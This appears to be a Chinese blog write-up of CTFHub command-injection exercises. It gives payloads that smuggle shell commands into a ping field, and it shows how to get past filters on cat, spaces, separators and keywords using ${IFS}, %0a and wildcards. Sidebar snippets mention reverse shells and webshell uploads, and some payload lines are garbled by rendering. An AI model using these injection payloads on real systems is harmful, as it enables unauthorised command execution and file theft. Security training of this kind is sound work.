ctfhub-->命令注入练习

最新推荐文章于 2024-08-05 20:56:17 发布
最新推荐文章于 2024-08-05 20:56:17 发布
阅读量678 收藏 3
点赞数
分类专栏: ctf web 文章标签: 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq2489021103/article/details/115384691
版权
ctf 同时被 2 个专栏收录
9 篇文章 2 订阅
订阅专栏
web
2 篇文章 0 订阅
订阅专栏

ctfhub-web练习–>各种绕过

1.这题没有任何过滤
在这里插入图片描述
直接127.0.0.1;ls获取目录,找到flag,然后cat
在这里插入图片描述

在这里插入图片描述flag在注释里面。
2.这题过滤了cat
在这里插入图片描述
百度下php类cat方法:
在这里插入图片描述

127.0.0.1;ls 得到目录后 127.0.0.1; less flag_11261594711502.php 得到flag
在这里插入图片描述
3.过滤空格
在这里插入图片描述
I F S 绕 过 127.0.0.1 ; c a t {IFS}绕过 127.0.0.1;cat IFS127.0.0.1;cat{IFS}flag_1630334994276.php

在这里插入图片描述
4.过滤目录分隔符
在这里插入图片描述先看看目录
127.0.0.1;ls
在这里插入图片描述然后看看flag_is_here目录里面有什么
127.0.0.1;ls flag_is_here

在这里插入图片描述

有flag,但是不在当前目录下,所以切换目录就行了
127.0.0.1;cd \flag_is_here;cat flag_160862057427113.php
在这里插入图片描述5.过滤运算符
在这里插入图片描述
过滤了| 和&
但是没有过滤 ; …
送分题
;ls;cat flag_17341506416268.php

在这里插入图片描述6.组合拳
在这里插入图片描述过滤了|,&,;,空格,cat,flag,ctfhub
这能难到我吗???
综合前面的
${IFS} -->空格
%0a(换行) --> ;
less --> cat
而且在url中提交才行
因为在输入框中提交会再进行url编码,意思就不是我们想要的了
先127.0.0.1%0als#看看目录

在这里插入图片描述

再127.0.0.1%0als${IFS}fla*#
看看有啥玩意

在这里插入图片描述
因为过滤了flag,所以要用fla*
然后127.0.0.1%0acd I F S f l a ∗ {IFS}fla*%0aless IFSfla{IFS}fla*.php#获取flag
在这里插入图片描述
简便方法:
127.0.0.1%0acd I F S f l a ∗ {IFS}fla*%0aless IFSfla{IFS}*.php#
因为根据前面几题都知道目录和flag都叫什么类型的名字了。。。。。。。

crypto_lee
关注
专栏目录
CTF命令注入(Dina 1.0)
afei001
04-01 579
练习环境     攻击机:kali     靶机:Ubuntu 12.04(Dina 1.0) 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255....
ctfhub-远程连接命令/代码执行漏洞
ad12456的博客
05-04 896
CTFHub练习
CTFHub_技能树_Web之RCE——“命令注入综合练习
Ho1aAs‘s Blog
07-29 2752
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 最后一题来了个狠的,cat、flag还有各种符号都被过滤了 分隔符可以使用%0a代替 若直接使用文本框上传命令会导致字符被转义,直接访问URL /?ip=127.0.0.1%0als => 127.0.0.1;ls 查看目录 接下来要访问flag_is_here,需要绕过空格过滤、flag文字过滤并且显示文件夹的内容 (space) => $
ctfhub 命令注入
最新发布
a666666688的博客
08-05 449
因为过滤了分割符,所以flag_is_here文件夹下的文件不能直接读取。若要在表单提交处修改则需要注意,提交后删除url中的25后即可执行。如果包含了这些被禁止的字符,就将匹配结果存储在。如果不包含这些字符,就构建一个。参数,会进行进一步的正则表达式匹配检查。这段代码的主要目的是根据用户通过。函数执行,将结果存储在。注意本体在url上修改即可。参数执行相应的操作。
CTFHub 命令注入-综合练习
qq_56096156的博客
03-21 985
1.因为运算符被过滤掉了,我们先用分号测试一下命令是否执行;2.接下来我们用cat命令查看flag文件。发现可以执行,并且找到了flag文件。然后右键查看网页源代码,找到hub.
CTFHUB技能树】-命令注入RCE综合练习
zguohuai的博客
03-15 693
CTFHUB攻防世界解决命令综合注入
CTFHub技能树web(持续更新)--RCE--命令注入--综合过滤练习
jiuyongpinyin的博客
01-27 2319
综合过滤练习 这道题试了好多种方法,最后才发现需要在url里面改才可以,也是参考了大佬的链接 我是大佬链接 这道题能过滤的基本都过滤了,我们第一步应该想办法查看当前文件夹的内容,这里常用的管道符都不能用,只能用换行符的url编码 %0a,并且去要在url中修改: ?ip=127.0.0.1%0als# 看到了回显就看到了希望,接下来要进入到flag这个文件夹中来查看该文件夹的内容,这里flag被过滤了,又学到了一个新的知识点TAB的url编码,我们用这个把文件夹的名字补全: ?ip=127.0.0.
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7186
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB-WEB-RCE【08】命令注入
(∪.∪ )...zzz的博客
06-10 229
????命令注入源代码用IP传入IP&ls 查看文件IP&cat 查看内容过滤cat使用`\` `''` `""` `{任意无意义变量名}`等方法均可绕过过滤空格`$IFS` `$IFS$9` 重定向符`<`过滤目录分隔符; && 执行多条命令过滤运算符;综合过滤练习%0a 命令注入 源代码用IP传入 IP&ls 查看文件 1.1.1.1&ls IP&cat 查看内容 1.1.1.1&cat 7096156205265.php 过
CTFHUB-web-RCE
ookami6497的博客
12-03 1496
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2206
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
CTF-命令注入
不知名白帽的博客
05-28 1137
CTF-命令注入,实验环境:(192.168.20.128),靶机(192.168.20.141)。通过信息探测,深入挖掘隐藏信息,获取账号和密码,用searchsploit搜寻漏洞,再用msfconsole进行监听,然后用base64绕过防火墙,生成sehll,上传shell,反弹shell...
命令注入————ctfhub(过滤cat、空格、目录分隔符、运算符、综合过滤练习
qq_45655564的博客
05-30 9339
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2370
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTF-命令注入【超详细】
不知名白帽的博客
09-05 9232
CTF-命令注入【超详细】
CTF-18.web安全命令注入
woo233的博客
10-08 1311
上传webshell获取控制权使用burpsuite绕过上传过滤机制,绕过前端检测机制,或%00截断绕过;执行shell,获取反弹shell.
CTF刷题记录CTFHub-RCE-命令注入
m_de_g的博客
07-24 4113
** CTFHub-RCE-命令注入 ** 一、解题思路 通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。 1.无任何的过滤 因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令 http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls 通过执行ls命令可以看到,该目下的文件,这是linux环境下 如果是window环境下,使用命令dir查看目录文件 我
android SVN 过滤
songzi1228的博客
03-22 846
之前在写项目的时候,不太会用SVN,有些该过滤的没有过滤(build文件),不该过滤的反而过滤掉了(so文件)。所以工作的时候很麻烦,只要设置好过滤就行了。设置方式:右键-tortoiseSVN-settings-global ignore pattern,输入*.iml build .idea user.iml local.properties gradlew.bat gradlew build...
CTF-命令注入绕过技巧总结
键盘的起始页
04-10 478
执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py http://challenge-e87e0210287ba7b3.sandbox.ctfhub.com:10800/.git/"来使用GitHack工具进行扫描和利用。同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,这些工具只是为了帮助你快速发现ctfhub-git的泄露,真正的挖掘过程并不会像这样直接告诉你哪里有泄露,需要自己去尝试和探索。此外,Git这一工具的使用也相当复杂,需要深入学习和实践才能熟练掌握。所以,在学习的道路上还有很长的路要走,希望你能坚持学习,共同进步!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值